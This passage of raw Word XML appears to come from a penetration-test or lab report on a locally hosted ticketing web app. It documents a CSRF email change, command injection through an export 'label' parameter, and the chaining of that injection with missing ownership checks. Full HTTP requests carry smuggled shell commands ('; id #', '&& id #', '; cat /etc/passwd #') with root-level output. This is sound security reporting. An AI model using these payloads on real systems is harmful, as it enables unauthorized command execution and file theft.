            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="06FBD3F9" w14:textId="1E8273C2" w:rsidR="005D3D36" w:rsidRDefault="005D3D36" w:rsidP="005D3D36">
            <w:r w:rsidRPr="005D3D36">
              <w:t>POST /profile/email/ HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
              <w:t>Content-Type: application/x-www-form-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>urlencoded</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
              <w:t>Content-Length: 27</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
              <w:t>email=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>attacker@evil.invalid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005D3D36">
              <w:br/>
              <w:t>→ 200 OK  {"user":"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>rmasri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>","email":"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>attacker@evil.invalid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D3D36">
              <w:t>"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A602DA8" w14:textId="77777777" w:rsidR="004E1A86" w:rsidRDefault="00C956ED" w:rsidP="004E1A86">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70384DBD" wp14:editId="0DD04B86">
            <wp:extent cx="6858000" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2112944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676650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAAC251" w14:textId="50D00D9D" w:rsidR="00F83CB4" w:rsidRDefault="004E1A86" w:rsidP="004E1A86">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F1F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5F16">
        <w:t xml:space="preserve">The account e-mail is changed with no CSRF token and no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D5F16">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D5F16">
        <w:t>/Origin header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD03F45" w14:textId="1421490F" w:rsidR="004E1A86" w:rsidRPr="004E1A86" w:rsidRDefault="005C4642" w:rsidP="005C4642">
      <w:r w:rsidRPr="005C4642">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
      <w:r w:rsidRPr="005C4642">
        <w:t>Confirmed</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005C4642">
        <w:t xml:space="preserve"> the endpoint accepts a token-less, cross-origin-style POST and changes account data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F320C9E" w14:textId="3EDD031A" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="006A3676">
        <w:t xml:space="preserve">Part B: </w:t>
      </w:r>
      <w:r w:rsidR="007C491F">
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C31861" w14:textId="77777777" w:rsidR="00C90AEF" w:rsidRPr="00C90AEF" w:rsidRDefault="00C90AEF" w:rsidP="00C90AEF">
      <w:r w:rsidRPr="00C90AEF">
        <w:t xml:space="preserve">The ticket export feature at /tickets/&lt;id&gt;/export/?label=&lt;value&gt; builds a shell command using the label parameter directly, without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C90AEF">
        <w:t>sanitisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C90AEF">
        <w:t>. Because the server appends “.txt” immediately after the label, each payload below ends in a trailing # to comment out that suffix so the shell does not choke on it. In Burp Repeater, the label value was selected and URL-encoded (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C90AEF">
        <w:t>Ctrl+U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C90AEF">
        <w:t>) before sending, so that the ; / &amp;&amp; / | / # characters and spaces survive transmission instead of being cut off as a URL fragment or splitting the query string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6F4F11" w14:textId="455142A4" w:rsidR="00C90AEF" w:rsidRDefault="00C90AEF" w:rsidP="00C90AEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B5 – Command chaining with “;”</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00654D78" w14:paraId="08710334" w14:textId="77777777" w:rsidTr="00654D78">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3E601E23" w14:textId="1B90FBFE" w:rsidR="00654D78" w:rsidRDefault="00654D78" w:rsidP="00654D78">
            <w:r w:rsidRPr="00654D78">
              <w:t>GET /tickets/2/export/?label=x%3B+id+%23 HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00654D78">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="00654D78">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00654D78">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00654D78">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00654D78">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00654D78">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="00654D78">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00654D78">
              <w:br/>
              <w:t xml:space="preserve">→ 200 OK   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00654D78">
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00654D78">
              <w:t>=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35096DC3" w14:textId="77777777" w:rsidR="00E70A0C" w:rsidRDefault="00654D78" w:rsidP="00E70A0C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44400FC1" wp14:editId="7989C9BA">
            <wp:extent cx="6858000" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1602513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3676650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A251B64" w14:textId="10ABFDDD" w:rsidR="00C90AEF" w:rsidRDefault="00E70A0C" w:rsidP="00E70A0C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F1F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005047B5">
        <w:t>label=x; id # on ticket #2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005047B5">
        <w:t>rmasri's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005047B5">
        <w:t xml:space="preserve"> own queue) returns the id output of the server process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011AB784" w14:textId="7A168BCD" w:rsidR="00C22C5B" w:rsidRPr="00C22C5B" w:rsidRDefault="00C22C5B" w:rsidP="00C22C5B">
      <w:r w:rsidRPr="00C22C5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22C5B">
        <w:t xml:space="preserve">  Confirmed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C22C5B">
        <w:t>arbitrary commands execute via the “;” shell separator, running as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFC4F8" w14:textId="6118B458" w:rsidR="00C90AEF" w:rsidRDefault="00C90AEF" w:rsidP="00C90AEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B6 – Confirmation with a second separator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B22C84" w14:textId="77777777" w:rsidR="006A4D55" w:rsidRPr="006A4D55" w:rsidRDefault="006A4D55" w:rsidP="006A4D55">
      <w:r w:rsidRPr="006A4D55">
        <w:t>To rule out a coincidental result, the same command was run using a different shell separator, “&amp;&amp;”, producing the identical output and confirming the injection is a genuine parsing flaw rather than an artefact of one payload.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="006073DC" w14:paraId="3DA130EF" w14:textId="77777777" w:rsidTr="006073DC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2B2821B0" w14:textId="3287EA37" w:rsidR="006073DC" w:rsidRDefault="006073DC" w:rsidP="006073DC">
            <w:r w:rsidRPr="006073DC">
              <w:t>GET /tickets/2/export/?label=x+%26%26+id+%23 HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="006073DC">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="006073DC">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006073DC">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006073DC">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006073DC">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006073DC">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="006073DC">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="006073DC">
              <w:br/>
              <w:t xml:space="preserve">→ 200 OK   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006073DC">
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006073DC">
              <w:t>=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BE615F1" w14:textId="77777777" w:rsidR="008F700D" w:rsidRDefault="006073DC" w:rsidP="008F700D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE238D8" wp14:editId="264C78C9">
            <wp:extent cx="6858000" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1817961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676650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C154052" w14:textId="5439942C" w:rsidR="00C22C5B" w:rsidRDefault="008F700D" w:rsidP="008F700D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F1F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003034ED">
        <w:t>label=x &amp;&amp; id # on ticket #2 reproduces the same command output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250C38D" w14:textId="3D44CA4F" w:rsidR="002124A5" w:rsidRPr="002124A5" w:rsidRDefault="002124A5" w:rsidP="002124A5">
      <w:r w:rsidRPr="002124A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
      <w:r w:rsidRPr="002124A5">
        <w:t>Confirmed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002124A5">
        <w:t>injection works through multiple shell metacharacters (;, &amp;&amp;), not a single edge case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4D983" w14:textId="47F8F854" w:rsidR="008F700D" w:rsidRDefault="002124A5" w:rsidP="002124A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B7 – Impact: reading a server file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276DB104" w14:textId="77777777" w:rsidR="00E507BA" w:rsidRPr="00E507BA" w:rsidRDefault="00E507BA" w:rsidP="00E507BA">
      <w:r w:rsidRPr="00E507BA">
        <w:t>To demonstrate concrete impact beyond a diagnostic command, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E507BA">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E507BA">
        <w:t>/passwd was read through the same injection point. The full file contents are returned in the response, confirming arbitrary file read (and, by extension, broader command execution) is achievable with no authentication beyond a normal support-agent session.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="000673A1" w14:paraId="7B2C796D" w14:textId="77777777" w:rsidTr="000673A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1067DA40" w14:textId="6B794B1C" w:rsidR="000673A1" w:rsidRDefault="000673A1" w:rsidP="000673A1">
            <w:r w:rsidRPr="000673A1">
              <w:t>GET /tickets/2/export/?label=x%3B+cat+/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000673A1">
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000673A1">
              <w:t>/passwd+%23 HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="000673A1">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="000673A1">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000673A1">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000673A1">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000673A1">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000673A1">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="000673A1">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="000673A1">
              <w:br/>
              <w:t>→ 200 OK   root:x:0:0:root:/root:/bin/bash ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="185AD9BB" w14:textId="77777777" w:rsidR="0008463C" w:rsidRDefault="000673A1" w:rsidP="0008463C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C83CCB6" wp14:editId="31773E21">
            <wp:extent cx="6858000" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="369826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3686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="077172C4" w14:textId="17A4D641" w:rsidR="006073DC" w:rsidRDefault="0008463C" w:rsidP="0008463C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F1F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00715867">
        <w:t>label=x; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715867">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715867">
        <w:t>/passwd # on ticket #2 returns the full contents of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715867">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715867">
        <w:t>/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B622EF" w14:textId="3612126F" w:rsidR="001D0FA2" w:rsidRPr="001D0FA2" w:rsidRDefault="001D0FA2" w:rsidP="001D0FA2">
      <w:r w:rsidRPr="001D0FA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
      <w:r w:rsidRPr="001D0FA2">
        <w:t>Confirmed</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001D0FA2">
        <w:t xml:space="preserve"> the injection point allows arbitrary file reads on the host, running as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F04188" w14:textId="4D7E73C3" w:rsidR="0008463C" w:rsidRDefault="00A85222" w:rsidP="001B5CC0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Finale: Chain</w:t>
      </w:r>
      <w:r w:rsidR="001B5CC0">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6F61A" w14:textId="011E5ECC" w:rsidR="006B6659" w:rsidRPr="006B6659" w:rsidRDefault="006B6659" w:rsidP="006B6659">
      <w:r w:rsidRPr="006B6659">
        <w:t>Individually, A1 lets a Customer Support agent read records outside their authority, and Part B lets anyone with export access run commands through the label field. Neither hole alone should allow command execution against a Billing ticket from a Customer Support account</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006B6659">
        <w:t xml:space="preserve">but since the export endpoint, like the ticket-detail endpoint, performs no ownership or queue check, the two issues combine directly. As </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B6659">
        <w:t>rmasri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B6659">
        <w:t xml:space="preserve">, the export endpoint was targeted at ticket 4 (Billing, outside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B6659">
        <w:t>rmasri's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B6659">
        <w:t xml:space="preserve"> queue) with the same injection payload used in B5:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D227B5" w14:paraId="4D8E4D20" w14:textId="77777777" w:rsidTr="00D227B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6E3DA275" w14:textId="7B5E3115" w:rsidR="00D227B5" w:rsidRDefault="00D227B5" w:rsidP="00D227B5">
            <w:r w:rsidRPr="00D227B5">
              <w:t>GET /tickets/4/export/?label=x%3B+id+%23 HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00D227B5">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="00D227B5">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D227B5">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D227B5">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D227B5">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D227B5">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="00D227B5">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00D227B5">
              <w:br/>
              <w:t xml:space="preserve">→ 200 OK   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D227B5">
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D227B5">
              <w:t>=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="002DE8E0" w14:textId="77777777" w:rsidR="007F1F8E" w:rsidRDefault="00D227B5" w:rsidP="007F1F8E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0483BED8" wp14:editId="6666FD57">
            <wp:extent cx="6858000" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15767492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3686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="101BFD4D" w14:textId="3069086A" w:rsidR="001B5CC0" w:rsidRDefault="007F1F8E" w:rsidP="007F1F8E">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xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00367B87">
        <w:t xml:space="preserve">Exporting ticket #4 (outside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367B87">
        <w:t>rmasri's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367B87">
